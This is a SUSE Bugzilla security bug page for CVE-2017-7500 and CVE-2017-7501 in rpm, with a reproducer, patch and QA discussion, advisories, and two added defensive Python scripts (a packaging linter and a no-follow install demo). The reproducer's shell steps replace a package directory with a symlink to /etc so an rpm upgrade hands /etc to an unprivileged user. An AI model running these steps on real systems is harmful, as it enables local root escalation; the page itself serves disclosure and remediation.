Bugzilla – Bug 943457
VUL-1: CVE-2017-7500 CVE-2017-7501: rpm: user owned subdirectories in rpm packages can lead user to root escalation
Last modified: 2023-06-21 03:19:23 UTC
rpm follows symlinks to directories when installing packages. I.e. if a package contains /usr/share/foo/bar and /usr/share/foo is a symlink to /etc, rpm would install bar into /etc. Moreover, rpm also applies all attributes to the directory the symlink is pointing at. That becomes a problem if a package contains subdirectories in directories owned by an unprivileged user. That unprivileged user can then replace the subdirectory with a symlink to a root owned directory. On the next package upgrade rpm would follow the symlink, change the ownership of the linked directory and install files there.

Consider the following example:

    $ cd ~/rpmbuild/SPECS
    $ cat perm.spec
    Name:           perm
    Version:        1
    Release:        0
    Group:          Development/Tools/Building
    Summary:        Lorem ipsum
    License:        GPL-2.0+
    BuildRoot:      %_tmppath/%name-%version-build
    Url:            http://www.opensuse.org/
    BuildArch:      noarch

    %description
    Lorem ipsum dolor sit amet, consectetur adipisici elit, sed eiusmod tempor incidunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquid ex ea commodi consequat. Quis aute iure reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint obcaecat cupiditat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.

    %prep

    %build

    %install
    install -d -m 755 %buildroot/usr/share/foo/bar
    echo test > %buildroot/usr/share/foo/bar/baz

    %files
    %defattr(0755,wwwrun,root)
    %dir /usr/share/foo
    %dir /usr/share/foo/bar
    /usr/share/foo/bar/baz

    %changelog

    $ rpmbuild -bb perm.spec
    ...
    $ sudo rpm -U ~/rpmbuild/RPMS/noarch/perm-1-0.noarch.rpm
    $ l /usr/share/foo/
    insgesamt 0
    drwxr-xr-x 1 wwwrun root    6 27. Aug 14:34 ./
    drwxr-xr-x 1 root   root 6132 27. Aug 14:34 ../
    drwxr-xr-x 1 wwwrun root    6 27. Aug 14:34 bar/
    $ sudo -u wwwrun rm -r /usr/share/foo/bar
    $ sudo -u wwwrun ln -s /etc /usr/share/foo/bar
    $ l /usr/share/foo/bar
    lrwxrwxrwx 1 wwwrun www 4 27. Aug 14:35 /usr/share/foo/bar -> /etc/
    $ l -d /etc/
    drwxr-xr-x 1 root root 6010 27. Aug 14:21 /etc//
    $ sudo rpm -U ~/rpmbuild/RPMS/noarch/perm-1-0.noarch.rpm --force
    $ l -d /etc/
    drwxr-xr-x 1 wwwrun root 6016 27. Aug 14:35 /etc//
    $ l /etc/baz
    -rwxr-xr-x 1 wwwrun root 5 27. Aug 14:34 /etc/baz*
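Added check, not part of the report and not rpm's or rpmlint's code: a small linter over lines in the layout of `rpm -q --dump` (path size mtime digest mode owner group isconfig isdoc rdev symlink) that flags the packaging pattern described above, namely a packaged entry nested below a packaged directory owned by a user other than root. The sample lines are constructed to match perm.spec plus two control cases (a root-owned tree, and a user-owned directory with nothing packaged beneath it, which is the legitimate use). It only sees directories the package itself ships; parent directories owned by other packages would have to be checked against the installed system.

```python
import posixpath
import stat

# Constructed sample in `rpm -q --dump` layout. The first three lines mirror
# perm.spec from the report; the digests are placeholder zeros.
SAMPLE_DUMP = """\
/usr/share/foo 0 1440678840 00000000000000000000000000000000 040755 wwwrun root 0 0 0 X
/usr/share/foo/bar 0 1440678840 00000000000000000000000000000000 040755 wwwrun root 0 0 0 X
/usr/share/foo/bar/baz 5 1440678840 00000000000000000000000000000000 0100755 wwwrun root 0 0 0 X
/usr/share/okpkg 0 1440678840 00000000000000000000000000000000 040755 root root 0 0 0 X
/usr/share/okpkg/data 3 1440678840 00000000000000000000000000000000 0100644 root root 0 0 0 X
/var/lib/wwwrun 0 1440678840 00000000000000000000000000000000 040755 wwwrun www 0 0 0 X
"""


def parse_dump(text):
    """Map path -> (mode, owner) from dump lines; blank or short lines are skipped."""
    entries = {}
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 10:
            continue
        path, mode, owner = fields[0], int(fields[4], 8), fields[5]
        entries[path] = (mode, owner)
    return entries


def user_owned_dirs(entries, trusted=("root",)):
    """Packaged directories whose owner is not in the trusted set."""
    return {
        path for path, (mode, owner) in entries.items()
        if stat.S_ISDIR(mode) and owner not in trusted
    }


def lint_dump(text, trusted=("root",)):
    """Return (path, nearest_untrusted_ancestor, ancestor_owner) for every
    packaged entry that lives below a packaged directory owned by an
    untrusted user. That owner could swap the ancestor's contents for a
    symlink before the next upgrade, which is the condition in this report."""
    entries = parse_dump(text)
    risky = user_owned_dirs(entries, trusted)
    findings = []
    for path in sorted(entries):
        parent = posixpath.dirname(path)
        while parent and parent != "/":
            if parent in risky:
                findings.append((path, parent, entries[parent][1]))
                break
            parent = posixpath.dirname(parent)
    return findings


if __name__ == "__main__":
    for path, ancestor, owner in lint_dump(SAMPLE_DUMP):
        print("%s is nested under %s (owned by %s)" % (path, ancestor, owner))
```

Run against a real package with `rpm -q --dump <pkg> | python3 lint.py` after replacing the constructed sample with stdin; a user-owned top-level directory by itself (the /var/lib/wwwrun case) produces no finding.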
Nope.
#18: if you read that comment in the Fedora bugzilla you'll notice that they asked me in irc about it.
Adding Florian Festi <ffesti@redhat.com> to cc.

Paraphrased summary from SUSE internal discussion:

"This may be a problem known for a long time unfixable without breaking other valid use cases."

"A fix would be a hard change in behavior, needs to be acked by upstream. Many changes required to make it that race-free, user could modify directory contents while an rpm gets installed."

"Possibly previously discussed in the context of chkstat."
So another year passed and we are still vulnerable with packagers adding more vulnerable packages.
found another new package submission to factory to fall into the trap. can this be made public now?
(This issue is public now.)
also CVE-2017-7501
Created attachment 731961 [details] CVE-2017-7500.patch CVE-2017-7500.patch for the directory traversal exploit part
https://bugzilla.redhat.com/show_bug.cgi?id=1452133 CVE-2017-7501 rpm: Following symlinks to files when installing packages allows privilege escalation
https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2017-7500 CVE-2017-7500 rpm: Following symlinks to directories when installing packages allows privilege escalation
Created attachment 731962 [details] CVE-2017-7501-1.patch CVE-2017-7501-1.patch 1/3 patches for file override
Created attachment 731963 [details] CVE-2017-7501-2.patch CVE-2017-7501-2.patch
Created attachment 731964 [details] CVE-2017-7501-3.patch CVE-2017-7501-3.patch
Using the maintenance update SUSE:Maintenance:7433:165047, I am still getting the same results for before and after for this bug. Please see the section for bug #943457 in the report here: http://qam.suse.de/testreports/SUSE:Maintenance:7433:165047/log I get the exact same results as comment #0 before and after. For me since this bug is VUL-1 means that the update needs rejecting.
That's because you're creating the symlink as user root. rpm treats this as indication that it is ok to follow the symlink. Note also that I didn't use the attached patches, but instead went with what rpm upstream committed. (BTW, just curious, who created that testcase?)
(In reply to Michael Schröder from comment #35)
> That's because you're creating the symlink as user root. rpm treats this as
> indication that it is ok to follow the symlink.
>
> Note also that I didn't use the attached patches, but instead went with what
> rpm upstream committed.
>
> (BTW, just curious, who created that testcase?)

So I tried again with the symlink created by the user (instead of wwwrun I used testsuser) and the file is still created. The permissions are still changed. From what I see it makes no difference. Can you please take a look at the report again at the same section? Maybe I did something wrong again?

I guess Ludwig Nussel created the testcase? If you have another, happy to try it as well, but I think this is ok, it shows the issue :)
Please let me know if there is something I'm doing wrong, I need some help on this because I'm blocked. Is the reproducer not correct for the patches that you used? Can you give me a "better" one? More suited to show the bug? Setting needinfo because the more this bug is not reproduced, the more the update will take to go out.
Hmm. Seems like the upstream fix is incomplete or wrong. I'm afraid I need to discuss this with the rpm people. (I have some idea on how to fix it but I don't know if this will break anything else.)
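Added illustration of the install-time side discussed in the comments above; this is not rpm's code and not the upstream fix Michael refers to. It walks every path component with O_NOFOLLOW through a directory fd, refuses any symlink component regardless of who owns it (stricter than the "root-created symlink is ok" policy described in comment 35), writes the payload to a temporary name inside the opened directory, applies the mode to the open fd, and rename()s over the destination so a symlink at the leaf is replaced rather than written through. The temporary tree, the file names and the temp-name suffix are constructed for the demo.

```python
import errno
import os
import shutil
import stat
import tempfile


class UnsafePath(Exception):
    """A path component is a symlink, '..', or not a directory."""


def open_dir_nofollow(root_fd, rel_dir):
    """Open rel_dir below root_fd one component at a time with O_NOFOLLOW,
    so a symlink planted in place of a package-owned subdirectory is refused
    instead of followed. Returns a directory fd the caller must close; it is
    also the handle on which fchmod/fchown would be applied."""
    fd = os.dup(root_fd)
    try:
        for comp in [c for c in rel_dir.split("/") if c and c != "."]:
            if comp == "..":
                raise UnsafePath("'..' component in %r" % rel_dir)
            flags = os.O_RDONLY | os.O_DIRECTORY | os.O_NOFOLLOW | os.O_CLOEXEC
            try:
                nfd = os.open(comp, flags, dir_fd=fd)
            except OSError as exc:
                # ELOOP: the component is a symlink; ENOTDIR: something else is there
                if exc.errno in (errno.ELOOP, errno.ENOTDIR):
                    raise UnsafePath("%r in %r is not a plain directory" % (comp, rel_dir)) from exc
                raise
            os.close(fd)
            fd = nfd
        return fd
    except BaseException:
        os.close(fd)
        raise


def install_file(root_fd, rel_path, data, mode=0o644):
    """Install data at rel_path (relative to root_fd) without following any
    symlink. Returns True when the final name is a regular file afterwards."""
    parent, _, name = rel_path.rpartition("/")
    dfd = open_dir_nofollow(root_fd, parent)
    try:
        tmp = ".%s.install-tmp" % name  # constructed temporary name
        flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | os.O_NOFOLLOW | os.O_CLOEXEC
        ffd = os.open(tmp, flags, 0o600, dir_fd=dfd)
        try:
            with os.fdopen(ffd, "wb") as fh:
                fh.write(data)
                # Attributes go on the fd we wrote, never on a path lookup.
                # When running as root, os.fchown(fh.fileno(), uid, gid) belongs here.
                os.fchmod(fh.fileno(), mode)
        except BaseException:
            os.unlink(tmp, dir_fd=dfd)
            raise
        # rename() replaces whatever sits at `name` (a planted symlink included).
        os.rename(tmp, name, src_dir_fd=dfd, dst_dir_fd=dfd)
        st = os.stat(name, dir_fd=dfd, follow_symlinks=False)
        return stat.S_ISREG(st.st_mode)
    finally:
        os.close(dfd)


def demo():
    """Throwaway tree mirroring the report (usr/share/foo/bar, etc/ as the
    target). Returns what happened in the honest, swapped-directory and
    leaf-symlink cases."""
    top = tempfile.mkdtemp(prefix="rpm-nofollow-demo-")
    results = {}
    try:
        os.makedirs(os.path.join(top, "usr/share/foo/bar"))
        os.makedirs(os.path.join(top, "etc"))
        root_fd = os.open(top, os.O_RDONLY | os.O_DIRECTORY | os.O_CLOEXEC)
        try:
            results["first_install_ok"] = install_file(root_fd, "usr/share/foo/bar/baz", b"test\n", 0o755)
            # The owner of usr/share/foo swaps bar for a symlink to etc.
            shutil.rmtree(os.path.join(top, "usr/share/foo/bar"))
            os.symlink(os.path.join(top, "etc"), os.path.join(top, "usr/share/foo/bar"))
            try:
                install_file(root_fd, "usr/share/foo/bar/baz", b"test\n", 0o755)
                results["upgrade_refused"] = False
            except UnsafePath:
                results["upgrade_refused"] = True
            results["etc_untouched"] = not os.path.exists(os.path.join(top, "etc/baz"))
            # Symlink at the leaf (the CVE-2017-7501 shape): replaced, not written through.
            os.symlink(os.path.join(top, "etc/target"), os.path.join(top, "usr/share/foo/link"))
            results["leaf_is_regular"] = install_file(root_fd, "usr/share/foo/link", b"x\n")
            results["leaf_target_untouched"] = not os.path.exists(os.path.join(top, "etc/target"))
        finally:
            os.close(root_fd)
    finally:
        shutil.rmtree(top)
    return results


if __name__ == "__main__":
    print(demo())
```

The refusal does not depend on the symlink's owner, which is the point where the reproducer in comment 0 and the root-created symlink discussed in comment 35 differ: neither gets followed.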
SUSE-SU-2018:2073-1: An update that solves one vulnerability and has two fixes is now available.
Category: security (moderate)
Bug References: 1094735,1095148,943457
CVE References: CVE-2017-7500
Sources used:
SUSE Linux Enterprise Module for Development Tools 15 (src): rpm-4.14.1-10.3.1
SUSE Linux Enterprise Module for Basesystem 15 (src): python-rpm-4.14.1-10.3.1, rpm-4.14.1-10.3.1
openSUSE-SU-2018:2215-1: An update that solves one vulnerability and has two fixes is now available.
Category: security (moderate)
Bug References: 1094735,1095148,943457
CVE References: CVE-2017-7500
Sources used:
openSUSE Leap 15.0 (src): python-rpm-4.14.1-lp150.9.3.1, rpm-4.14.1-lp150.9.3.1
Quick question: When will this fix be backported to SLES12SP2/SP3 ?
Any time you like to release it. The patch is already finished, I just need to commit it and submit the update.
Thanks Michael ! Pls. do so for SLES11 SP4 / SLES12 SP2 & SP3, as my customer is awaiting it (Bundesagentur für Arbeit is somehow a bit more aligned to CERT/Fixes due to their natural alignment)
@Michael: Any news here ... customer was just asking about an update !
The update is submitted to maintenance (SR#172484). It now needs to go through QA, which might take some time.
SUSE-SU-2018:3286-1: An update that fixes two vulnerabilities is now available.
Category: security (moderate)
Bug References: 1077692,943457
CVE References: CVE-2017-7500,CVE-2017-7501
Sources used:
SUSE Linux Enterprise Software Development Kit 12-SP3 (src): rpm-4.11.2-16.16.1
SUSE Linux Enterprise Server 12-SP3 (src): python3-rpm-4.11.2-16.16.1, rpm-4.11.2-16.16.1, rpm-python-4.11.2-16.16.1
SUSE Linux Enterprise Desktop 12-SP3 (src): rpm-4.11.2-16.16.1, rpm-python-4.11.2-16.16.1
SUSE CaaS Platform ALL (src): rpm-4.11.2-16.16.1, rpm-python-4.11.2-16.16.1
SUSE CaaS Platform 3.0 (src): rpm-4.11.2-16.16.1, rpm-python-4.11.2-16.16.1
OpenStack Cloud Magnum Orchestration 7 (src): rpm-4.11.2-16.16.1, rpm-python-4.11.2-16.16.1
openSUSE-SU-2018:3373-1: An update that fixes two vulnerabilities is now available.
Category: security (moderate)
Bug References: 1077692,943457
CVE References: CVE-2017-7500,CVE-2017-7501
Sources used:
openSUSE Leap 42.3 (src): python3-rpm-4.11.2-14.10.1, rpm-4.11.2-14.10.1, rpm-python-4.11.2-14.10.1
@Michael: SLES12SP2 (LTSS) is still missing ... can we release this, too ?
Dunno. Should we?
(There's nothing to submit from my side for this.)
SUSE-SU-2018:3884-1: An update that fixes two vulnerabilities is now available.
Category: security (important)
Bug References: 943457
CVE References: CVE-2017-7500,CVE-2017-7501
Sources used:
SUSE OpenStack Cloud 7 (src): python3-rpm-4.11.2-16.21.1, rpm-4.11.2-16.21.1, rpm-python-4.11.2-16.21.1
SUSE Linux Enterprise Software Development Kit 12-SP4 (src): rpm-4.11.2-16.21.1
SUSE Linux Enterprise Software Development Kit 12-SP3 (src): rpm-4.11.2-16.21.1
SUSE Linux Enterprise Server for SAP 12-SP2 (src): python3-rpm-4.11.2-16.21.1, rpm-4.11.2-16.21.1, rpm-python-4.11.2-16.21.1
SUSE Linux Enterprise Server 12-SP4 (src): python3-rpm-4.11.2-16.21.1, rpm-4.11.2-16.21.1, rpm-python-4.11.2-16.21.1
SUSE Linux Enterprise Server 12-SP3 (src): python3-rpm-4.11.2-16.21.1, rpm-4.11.2-16.21.1, rpm-python-4.11.2-16.21.1
SUSE Linux Enterprise Server 12-SP2-LTSS (src): python3-rpm-4.11.2-16.21.1, rpm-4.11.2-16.21.1, rpm-python-4.11.2-16.21.1
SUSE Linux Enterprise Server 12-SP2-BCL (src): python3-rpm-4.11.2-16.21.1, rpm-4.11.2-16.21.1, rpm-python-4.11.2-16.21.1
SUSE Linux Enterprise Server 12-SP1-LTSS (src): python3-rpm-4.11.2-16.21.1, rpm-4.11.2-16.21.1, rpm-python-4.11.2-16.21.1
SUSE Linux Enterprise Server 12-LTSS (src): python3-rpm-4.11.2-16.21.1, rpm-4.11.2-16.21.1, rpm-python-4.11.2-16.21.1
SUSE Linux Enterprise Desktop 12-SP4 (src): python3-rpm-4.11.2-16.21.1, rpm-4.11.2-16.21.1, rpm-python-4.11.2-16.21.1
SUSE Linux Enterprise Desktop 12-SP3 (src): rpm-4.11.2-16.21.1, rpm-python-4.11.2-16.21.1
SUSE Enterprise Storage 4 (src): python3-rpm-4.11.2-16.21.1, rpm-4.11.2-16.21.1, rpm-python-4.11.2-16.21.1
SUSE CaaS Platform ALL (src): rpm-4.11.2-16.21.1, rpm-python-4.11.2-16.21.1
SUSE CaaS Platform 3.0 (src): rpm-4.11.2-16.21.1, rpm-python-4.11.2-16.21.1
OpenStack Cloud Magnum Orchestration 7 (src): rpm-4.11.2-16.21.1, rpm-python-4.11.2-16.21.1
SUSE-SU-2018:3884-2: An update that fixes two vulnerabilities is now available.
Category: security (important)
Bug References: 943457
CVE References: CVE-2017-7500,CVE-2017-7501
Sources used:
SUSE Linux Enterprise Server for SAP 12-SP1 (src): python3-rpm-4.11.2-16.21.1, rpm-4.11.2-16.21.1, rpm-python-4.11.2-16.21.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
We need this fix for SLES11 SP3 (LTSS). There is a L3 bug with a customer requesting this fix as well. Is it possible? Thanks!
Bah, that's rpm-4.4.2.3. That'll be a lot of work for a VUL-1 classified bug. Why do they request it?
(In reply to Michael Schröder from comment #58)
> Bah, that's rpm-4.4.2.3. That'll be a lot for work for a VUL-1 classified
> bug. Why do they request it?

The customer is requesting because they are using SLES11 SP3 LTSS. Thus, they want the security fix. ;-)
https://bugzilla.suse.com/show_bug.cgi?id=1135195
That wasn't my point. My point was that this is a very minor security problem (thus the VUL-1, i.e. "fix with the next update").
(In reply to Michael Schröder from comment #60)
> That wasn't my point. My point was that this is a very minor security
> problem (thus the VUL-1, i.e. "fix with the next update").

Do we have a fix for SLES 11 SP3 in progress? I can see only for SLES 12 and SLES 15. I don't think the customer is willing to upgrade to SLES 12, they have a good support time for SLES 11 SP3 yet.
Well, as L3 said they would do the backport I'm currently not working on it.
Hello guys, I'm trying to make sure that CVE-2017-7501 is fixed in SLE 15 SP2. It is marked as not affected in SMASH; also in the RH bugzilla and the RPM changelog it is marked as fixed in version 4.14.0. But looking at the actual commit, it narrowly didn't make it into rpm 4.14.0: https://github.com/rpm-software-management/rpm/commit/404ef011c300207cdb1e531670384564aae04bdc so it also didn't make it into our package in SP2, and there isn't a separate patch (like there is one for CVE-2017-7500). It seems to me that maybe we are still affected. Am I missing something?
(SLE-15-SP2 comes with 4.14.1)

I think it is included. There are just a couple of commits on top of it:
https://github.com/rpm-software-management/rpm/commit/2979d4ef5579e2bb3295ed0c97e322bebe5f0f46
https://github.com/rpm-software-management/rpm/commit/cd3b20574b4d75b973bfa9e6cdb15b6289ab27e3
(In reply to Michael Schröder from comment #64)
> (SLE-15-SP2 comes with with 4.14.1)
>
> I think it is included. There are just a couple of commits on top of it:
>
> https://github.com/rpm-software-management/rpm/commit/2979d4ef5579e2bb3295ed0c97e322bebe5f0f46
> https://github.com/rpm-software-management/rpm/commit/cd3b20574b4d75b973bfa9e6cdb15b6289ab27e3

Thanks, Michael! That clears all my doubts.